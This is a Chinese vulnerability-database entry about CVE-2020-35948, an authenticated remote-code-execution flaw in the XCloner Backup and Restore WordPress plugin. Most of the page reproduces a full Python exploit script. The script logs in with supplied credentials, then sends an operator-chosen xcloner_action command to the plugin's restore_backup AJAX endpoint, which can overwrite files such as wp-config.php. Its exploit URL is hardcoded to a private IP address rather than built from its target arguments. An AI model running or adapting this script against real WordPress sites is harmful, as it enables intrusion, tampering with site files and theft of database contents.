wordpress xcloner backup and Restore plugin 安全漏洞

漏洞ID 2305146 漏洞类型 其他
发布时间 2021-07-02 更新时间 2021-07-02
CVE编号 CVE-2020-35948 CNNVD-ID CNNVD-202012-1890
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2021070010


http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-1890

|漏洞详情
WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 XCloner Backup and Restore plugin before 4.2.13 for WordPress 存在安全漏洞,该漏洞允许经过身份验证的攻击者能够修改任意文件,包括PHP文件。攻击者可利用该漏洞实现远程代码执行。
|漏洞EXP 
# Exploit Title: WordPress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)
# Date 30.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.xcloner.com/
# Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip
# Version: 4.2.1 - 4.2.12
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-35948
# CWE: CWE-732
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md

'''
Description:
An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files, 
including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php, 
for example. Alternatively, an attacker could create an exploit chain to obtain a database dump.
'''


'''
Banner:
'''
banner = """


  #####  #     # #######        #####    ###    #####    ###          #####  #######  #####  #        #####  
 #     # #     # #             #     #  #   #  #     #  #   #        #     # #       #     # #    #  #     # 
 #       #     # #                   # #     #       # #     #             # #       #     # #    #  #     # 
 #       #     # #####   #####  #####  #     #  #####  #     # #####  #####  ######   ###### #    #   #####  
 #        #   #  #             #       #     # #       #     #             #       #       # ####### #     # 
 #     #   # #   #             #        #   #  #        #   #        #     # #     # #     #      #  #     # 
  #####     #    #######       #######   ###   #######   ###          #####   #####   #####       #   #####  
                                                                                                             
                                                                                                             
                                                                
                                                                by @Hacker5preme
"""
print(banner)


'''
Import required modules:
'''
import requests
import argparse


'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')
ajax_cmd = input('[*] Ajax Command to execute: ')

'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'

# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log':  username, 
    'pwd': password, 
    'wp-submit': 'Log In', 
    'testcookie': '1'
}

# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header= auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
    print('[+] Authentication successfull !')
else:
    print('[-] Authentication failed !')
    exit()


'''
Exploit:
'''
url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup"

header = {
    "Accept": "*/*",
    "Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357",
    "Connection": "close"
}

# Body:
body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd)

exploit = session.post(url_exploit, headers=header, data=body)
print('')
print(exploit.text)
print('')

|参考资料

来源:MISC

链接:https://www.wordfence.com/blog/2020/09/critical-vulnerabilities-patched-in-xcloner-backup-and-restore-plugin/

来源:MISC

链接:https://wpscan.com/vulnerability/10412

来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2020-35948

声明:本站(华域联盟www.cnhackhy.com)所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。